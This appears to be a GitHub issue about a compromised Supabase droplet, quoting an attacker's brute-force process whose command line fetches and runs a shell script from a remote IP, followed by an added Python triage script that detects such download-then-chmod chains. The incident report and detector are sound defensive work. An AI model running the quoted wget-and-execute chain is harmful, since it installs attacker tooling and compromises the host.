digitalocean/supabase-on-do

[security] suspicious process & files causing 100% CPU

Closed this issue · 1 comments

version: ubuntu-22-10-x64

Observation

After deploying, the CPU goes to nearly 100% and the outgoing bandwidth is also running at 6MB/s.

Investigation

We discovered a process similar to:

./brute 22 1adrian1 5000 i cd /var/tmp ; wget http://141.98.6.76:6969/tDBR4L/sc.sh ; chmod u+x sc.sh ; sed -i -e 's/\r$/

While looking for this file we discovered a directory full of suspicious scripts:

root@supabase-droplet:/var/tmp/.g/miliardu# ls
22  IPBlacklist.list  banner.log  bozn  brute  fast.sh  i  input.txt  pass  ports1  ports1fast  ports2  ranges.lst  scan.log  scan.sh

Most of these are binary files. We are conducting our internal checks to see if it's something on our end, but just want to get your take on it and inform you of this issue.

ok issue's on our side :) passwords people! sorry for the alarm
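
A triage check for the pattern reported in this issue (a process running out of a hidden directory under /var/tmp, with a download-then-chmod chain in its command line), added here as an example and not part of the original issue or the supabase-on-do project. The function names, the heuristics and the sample records are assumptions constructed for illustration.

```python
import os
import re

# World-writable staging directories where dropped tooling usually lands.
TEMP_ROOTS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# A download followed by "chmod +x" inside one command string.
FETCH_THEN_CHMOD = re.compile(r"\b(?:wget|curl)\b.*?[;&|].*?\bchmod\s+[ugoa]*\+x", re.S)

def triage(exe, cwd, cmdline):
    """Return the reasons a process looks like dropped tooling (empty list if none)."""
    reasons = []
    for label, path in (("exe", exe), ("cwd", cwd)):
        norm = os.path.normpath(path) + "/"
        if norm.startswith(TEMP_ROOTS):
            reasons.append(f"{label} in temp dir")
            if any(part.startswith(".") for part in norm.split("/")):
                reasons.append(f"{label} under hidden directory")
    if exe.endswith(" (deleted)"):  # /proc/<pid>/exe marks unlinked binaries this way
        reasons.append("binary deleted from disk")
    if FETCH_THEN_CHMOD.search(cmdline):
        reasons.append("download then chmod +x in command line")
    return reasons

def flagged(records):
    """Map pid -> reasons for every (pid, exe, cwd, cmdline) record that trips a check."""
    return {pid: why for pid, exe, cwd, cmd in records if (why := triage(exe, cwd, cmd))}

def live_processes(proc="/proc"):
    """Yield (pid, exe, cwd, cmdline) from /proc; run as root to see every process."""
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            exe = os.readlink(f"{proc}/{pid}/exe")
            cwd = os.readlink(f"{proc}/{pid}/cwd")
            with open(f"{proc}/{pid}/cmdline", "rb") as f:
                cmd = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:  # kernel threads, exited processes, or no permission
            continue
        yield pid, exe, cwd, cmd

# Constructed sample records (not captured from the droplet); 192.0.2.10 is a documentation address.
SAMPLE = [
    ("812", "/usr/sbin/sshd", "/", "sshd: /usr/sbin/sshd -D"),
    ("4021", "/var/tmp/.g/miliardu/brute", "/var/tmp/.g/miliardu", "./brute"),
    ("4100", "/usr/bin/dash", "/var/tmp", "sh -c cd /var/tmp ; wget http://192.0.2.10/sc.sh ; chmod u+x sc.sh"),
]

if __name__ == "__main__":
    for pid, why in flagged(live_processes()).items():
        print(pid, "; ".join(why))
```

These are heuristics: legitimate software sometimes works out of /tmp, so each hit is a lead to inspect rather than a verdict.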